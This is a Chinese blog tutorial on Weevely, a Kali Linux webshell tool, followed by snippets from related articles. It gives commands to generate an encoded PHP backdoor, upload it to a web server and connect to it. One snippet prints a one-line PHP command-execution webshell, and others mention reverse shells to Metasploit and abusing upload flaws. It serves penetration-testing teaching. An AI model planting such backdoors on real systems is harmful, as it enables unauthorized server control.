kali中的中国菜刀weevely

最新推荐文章于 2024-12-13 07:00:00 发布
最新推荐文章于 2024-12-13 07:00:00 发布
阅读量2.1w 收藏 46
点赞数 14
CC 4.0 BY-SA版权
分类专栏: kali linux 渗透 文章标签: kali 安全 渗透 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37458055/article/details/70215521
Weevely是一款集成在Kali中的WebShell工具,具备生成及连接功能,支持PHP后门生成,并采用随机参数与加密方式提升隐蔽性。本文介绍如何使用Weevely生成并连接后门,包括生成加密的PHP文件、通过命令行进行连接,以及一些高级功能如生成图片后门等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。

    weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password


这是生成后的php后门,是base64加密过后的。


将此后门上传到网站,用weevely连接,连接后面直接跟上设置的密码

weevely http://192.168.179.137/doyo/1.php password

 

 


可以直接连接上,但是有些事乱码,在终端界面修改一下编码即可,乱码的都是中文字符,

 


weevely还可以生成图片后门。同时weevely还有多个模块使用,在连接上后门之后按Tab键,可以查看可利用的模块,


这张图片是模块功能详解


里面功能还有很多,具体使用到在研究,毕竟工具很多,不能每天都在学习使用工具。

 

作者:司令

WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 4003
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
weevely生成木马并反向shell连接msf
小刚的博客
05-13 4399
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
最新kaliweevely
vanony的博客
10-04 694
描述:   突破网络壳。   一种为利用后目的设计的Web Shell,可以在运行时通过网络对其进行扩展。   将weevely PHP代理上传到目标web服务器以获得对它的远程shell访问。一旦连接上,您可以使用30多个模块来协助管理任务、维护访问、提供态势感知、提升特权并扩展到目标网络。 概要 运行终端到目标 weevely <URL> <password> [cmd] 生成后门代理 weevely generate <password> <pat
kali linux下的weevely 的使用
young‘s blog
07-11 2082
weevelykali linux中一个管理工具,通过后门连接。 可以生成后门,可以通过后门连接上。并且会对产生的后门进行一些免杀的编写,但是免杀效果咋样还需要测试一下。 ...
利用Kali Linux与Weevely渗透测试DVWA靶机(low安全等级)文件上传漏洞
最新发布
Liu_Bruce的博客
12-13 1988
Weevely是一款轻量级PHP木马生成器和控制框架,允许用户创建一个后门程序并通过Web shell与其交互。它支持多种功能如执行命令、下载/上传文件等,非常适合用于渗透测试场景下的远程管理任务。
Kali工具-webshell之weevely
明明见自己的专栏
03-29 1158
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
KALI 菜刀weevely基本操作和使用(超级详细图解)
WHOAMI的博客
12-31 6647
KALI 菜刀weevely基本操作和使用(超级详细图解) 本人作为一个工具DOG(可能连工具dog都吧自己说牛了),个人认为在WIN下,中国菜刀还是很强大的。但是KALI中也有类似中国菜刀的工具 ——weevely**,这里给本人记录一下,也请大佬们请多多指点……多说无用,直接上菜儿,基本用法步骤如下:** 0x01 首先,KALI终端准备开始搞事; 0x02 在KALI终端 键入命令 weevely 打开工具;(哈哈,我的是4.0.1,别笑话我啊!) 》》》weevely 0x03 发现
kaliterminal替代_kali下的中国菜刀(一)
weixin_33789616的博客
12-23 1019
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用在 windows 操作系统下,相信做渗透的都不会陌生 中国菜刀 这款 webshell 管理工具!利用它,我们可以对收集的 shell 进行统一的管理使用。并且菜刀内部的强大函数库,也为我们提供了许多方便的操作接口!那么在强大的武器库 kali 下,自然也少不了 webs hell 方面的管理及生成工具。下面介绍的这款工具...
KALI 菜刀weevely基本操作和使用
cuisidong1997的博客
09-25 452
KALI 菜刀weevely基本操作和使用(超级详细图解)
VMware之kali安装中国蚁剑
热门推荐
xdbzdgx的博客
11-10 1万+
简介 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具,其核心是当年的中国菜刀中国蚁剑推崇模块化的开发思想,遵循开源,其主要核心功能主要有以下几种 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 当然,开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解熟悉整个应用的执行流程,然
kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely
weixin_43239236的博客
01-23 988
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
Kali Linux中Dmitry与Weevely的使用教程
中国的“菜刀”工具相比,Weevely提供了更丰富的功能,但仅支持PHP后门的创建和管理。对于初学者来说,Weevely可能需要一定的学习曲线,因为它只提供命令行界面。 三、Weevely的使用步骤 1. 在Kali Linux终端启动...
Kali linux 学习笔记(五十六)Web渗透——webshell(中国菜刀、webacoo、weevely) 2020.3.31
闵行小鱼塘
03-31 1285
学习webshell
【webshell管理工具之二】weevely
redwand的博客
05-09 3011
weevelykali下集成的一款很好用的专门针对php语言的webshell管理工具,其加密的数据传输和易于操控的特性广受渗透测试们的喜爱。
上传渗透----中国菜刀kali的使用(安全攻防)
baidu_38803985的博客
04-09 5523
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜刀kali这两个工具 实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕...
2021Kali系列 -- linux菜刀(weevely3)
Web安全工具库
04-19 3094
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..
weevely Linux kali 系统自带的菜刀
学习、分享、交流
04-09 3156
weevely是一款基于python编写的webshell生成、管理工具。
上传漏洞实战——中国菜刀kali
测试喵~
07-22 1665
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2我们还需要 中国菜刀kali 这两个工具,把所有的杀毒软件关了,不然中国菜刀可能会被杀毒软件和谐。实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webs
如何利用Kali Linux进行网站渗透测试:最常用工具详解
weixin_43263566的博客
05-13 8412
Kali Linux 2022.4虚拟机中常用的渗透测试工具介绍
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值